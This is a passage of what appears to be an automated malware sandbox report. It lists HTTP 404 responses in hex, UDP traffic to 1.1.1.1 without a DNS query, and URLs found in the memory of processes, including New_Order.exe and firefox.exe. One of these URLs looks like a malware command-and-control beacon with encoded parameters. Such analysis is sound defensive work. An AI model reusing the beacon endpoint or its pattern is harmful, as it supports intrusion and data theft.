20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Sun, 03 Dec 2023 15:27:01 GMTConnection: closeContent-Length: 4857Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Sun, 03 Dec 2023 15:27:04 GMTConnection: closeContent-Length: 4857Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Sun, 03 Dec 2023 15:27:07 GMTConnection: closeContent-Length: 4990Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 Dec 2023 15:28:21 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 Dec 2023 15:28:23 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 Dec 2023 15:28:26 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 Dec 2023 15:28:29 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: wextract.exe, 00000013.00000002.4167723777.0000000005886000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000002D16000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2093049974.000000000C436000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: New_Order.exe, 00000000.00000002.1755763102.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, QjSljS.exe, 0000000B.00000002.1805856527.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: wextract.exe, 00000013.00000002.4167723777.00000000061F2000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.busan3-200.com:80/fdo5/?fXUX=ShJ8DFcXvtj84pw&amp;540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaU
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
